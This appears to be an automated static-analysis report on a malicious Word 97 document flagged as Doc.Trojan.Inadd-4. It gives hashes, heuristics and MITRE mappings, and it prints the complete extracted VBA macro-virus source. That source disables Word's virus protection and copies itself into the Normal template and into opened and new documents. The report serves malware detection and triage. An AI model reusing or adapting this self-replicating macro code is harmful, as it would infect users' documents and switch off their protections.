Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 397807c34b890482…

MALICIOUS

Office (OLE)

Size: 26.5 KB
Created: 2000-08-23 21:42:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 5c72aa2e8c2b25605f2f3491bb34ab3e
SHA-1: 17be7e20859a8a12a08f0ef6ed1260aeacef3374
SHA-256: 397807c34b890482fc7b5b909d7ec0e48d25bccb32fc1b8f0a3b9839f24f4c72
Risk Score: 120

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

The sample is a malicious Word document containing VBA macros, specifically a Document_Open macro designed to infect the Normal template. Infecting the Normal template is a persistence mechanism: once the macro code lives there, Word loads it with every future document. The macro copies its own code module into the Normal template if that template contains no code yet, and, when the macro is already running from the Normal template, saves the active document so that it carries the code as well, indicating a self-propagation and persistence strategy.

Heuristics (3)

  • ClamAV: Doc.Trojan.Inadd-4 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Inadd-4
  • VBA macros detected [medium] (OLE_VBA_MACROS), 1 related finding
    Document contains VBA macro code
  • Document_Open macro [high] (OLE_VBA_DOCOPEN)
    Document contains a Document_Open macro, which runs automatically when the document is opened

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 1189 bytes
SHA-256: 1665b31d768937b3413471b0dde663a84c1d2dea733acbd94f4371108b7b8777

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error Resume Next
Options.VirusProtection = False
Options.SaveNormalPrompt = False

If MacroContainer.FullName = NormalTemplate.FullName Then Set Infect = ActiveDocument.VBProject.vbcomponents(1).codemodule: SaveIt = 1
If MacroContainer.FullName = ActiveDocument.FullName Then Set Infect = NormalTemplate.VBProject.vbcomponents(1).codemodule
If Infect.countoflines < 1 Then Infect.addfromstring MacroContainer.VBProject.vbcomponents(1).codemodule.lines(1, MacroContainer.VBProject.vbcomponents(1).codemodule.countoflines)
If SaveIt = 1 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, Fileformat:=wdDocument

Payload:

End Sub

Private Sub document_new()
Set Norm = NormalTemplate.VBProject.vbcomponents(1).codemodule
Set Active = ActiveDocument.VBProject.vbcomponents(1).codemodule

Active.addfromstring Norm.lines(1, Norm.countoflines)
ActiveDocument.Saved = True

End Sub